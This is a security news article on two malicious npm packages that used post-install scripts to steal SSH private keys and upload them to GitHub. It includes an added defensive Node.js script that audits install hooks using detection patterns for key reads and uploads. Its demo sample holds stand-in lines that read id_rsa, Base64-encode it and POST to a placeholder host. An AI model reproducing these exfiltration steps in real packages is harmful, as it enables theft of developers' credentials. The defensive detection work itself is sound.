Malicious NPM packages used to target GitHub developers’ SSH keys

esteria.white

Security researchers have discovered two malicious packages on the open source package manager npm that used GitHub to store Base64-encoded SSH keys stolen from developers’ systems.

These packages, identified earlier this month, have since been removed from npm. According to a ReversingLabs report released today, the discovery reflects an ongoing trend of cybercriminals abusing open source package managers for software supply chain malware campaigns.

More broadly, the company reported a 1,300% increase in malicious packages found on open source package managers between 2020 and the end of 2023. These range from low-threat protestware to more sophisticated campaigns that deliver malware directly through open source packages.

The first package, warbeast2000, is still under development but already exhibited malicious behavior in its latest version. On installation it ran a post-install script that fetched and executed a JavaScript file. That script reads the private SSH key from the id_rsa file in the .ssh directory and uploads the Base64-encoded key to an attacker-controlled GitHub repository.

The second package, kodiak2k, had a similar operating mode, with additional features in its later versions, including invoking the Mimikatz hacking tool and running various scripts.
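As an added example for the two packages described above (not code from the ReversingLabs report or from either package), here is a small Node.js audit that walks an unpacked npm package's install-time lifecycle hooks and the script each hook launches, flagging the indicators the report describes: SSH key access, Base64 staging and an outbound upload. The package names and file contents in the samples are constructed for the demo.

```javascript
// Added detection sketch (not ReversingLabs' or the packages' code): audit an
// unpacked npm package, given as a map of path -> contents, for install hooks
// whose command or launched script shows the behaviour described above.
const HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const INDICATORS = [
  { name: "ssh-key-read",   re: /\.ssh[\\\/'"]|id_rsa|id_ed25519|id_ecdsa/ },
  { name: "base64-staging", re: /toString\(\s*['"]base64['"]\s*\)|\bbase64\b/i },
  { name: "remote-upload",  re: /https?:\/\/|\bcurl\b|\bwget\b|\bfetch\(|https?\.request\(/ },
];
function indicatorsIn(text) {
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}
// Script file a hook launches, e.g. "node ./setup.js" -> "setup.js" (else null).
function launchedFile(command) {
  const m = /\bnode\s+(?:\.\/)?([\w.\/-]+\.[cm]?js)\b/.exec(command);
  return m ? m[1] : null;
}

// One finding per install hook; "block" when an SSH key path is referenced,
// "review" for any other indicator, "info" for a hook that shows none.
function auditPackage(files) {
  const pkg = JSON.parse(files["package.json"]);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const script = launchedFile(cmd);
    const body = script && files[script] !== undefined ? files[script] : "";
    const hits = new Set([...indicatorsIn(cmd), ...indicatorsIn(body)]);
    const verdict = hits.has("ssh-key-read") ? "block" : hits.size ? "review" : "info";
    findings.push({ name: pkg.name, hook, command: cmd, script,
                    indicators: [...hits].sort(), verdict });
  }
  return findings;
}

// Constructed samples: package names and file contents are invented for this demo.
const SAMPLE = {
  "package.json": JSON.stringify({ name: "demo-pkg",
    scripts: { postinstall: "node ./setup.js", test: "mocha" } }),
  "setup.js": [
    "// stand-in for an installer-launched script; deliberately not runnable",
    "const p = path.join(os.homedir(), '.ssh', 'id_rsa');",
    "const b64 = data.toString('base64');",
    "https.request({ host: 'example.invalid', path: '/upload', method: 'POST' });",
  ].join("\n"),
};
const BENIGN = { "package.json": JSON.stringify({ name: "benign-pkg", scripts: { prepare: "tsc -p .", test: "jest" } }) };

console.log(JSON.stringify(auditPackage(SAMPLE), null, 2));
```

Run it against a downloaded tarball's extracted files before installing (or with `npm install --ignore-scripts` first); a "block" verdict is a reason not to run the hook at all, and "review" findings are worth reading by hand.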


ReversingLabs warned that an alarming aspect of these attacks is their targeting of SSH keys, which can provide unauthorized access to GitHub repositories and potentially expose proprietary code.

Fortunately, the impact of this campaign was limited: warbeast2000 was downloaded around 400 times and kodiak2k around 950 times.

However, ReversingLabs expressed concern about malicious actors’ increasing reliance on open source software and development platforms such as GitHub to host malicious command and control (C2) infrastructure components.

“With more and more open source malware available, GitHub is increasingly being used by malicious actors to support their campaigns. Often, these open source malware packages are feature-rich and come with very detailed documentation allowing even low-skilled hackers (“script kiddies”) to deploy them,” the advisory reads.

“As malicious actors continue to develop new techniques for writing malware, developers as well as security researchers must be wary of new threats lurking in public repositories.”

To counter these threats, the company recommended that developers perform a security assessment before incorporating software or a library from package managers like npm or PyPI.

Image credit: Primakov / Shutterstock.com
